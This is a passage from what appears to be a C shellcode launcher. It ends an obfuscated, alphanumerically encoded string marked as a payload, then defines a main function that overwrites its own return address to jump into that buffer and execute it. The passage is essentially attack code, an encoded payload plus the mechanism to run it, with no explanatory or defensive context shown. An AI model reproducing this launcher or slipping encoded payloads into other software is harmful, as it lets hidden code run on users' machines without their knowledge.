"NJENKKN2FEF9GtDqFbLUBnGhFCEmEGIXQaGPI8Q6LuClDkISG6OkDsOVQSKPIcQJGNQiOfClHmPzNSFNQiL1PHOEDVLNINDUITDCEoCKBBO3DNOKLJAA";
// End Payload
int
main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shell;
}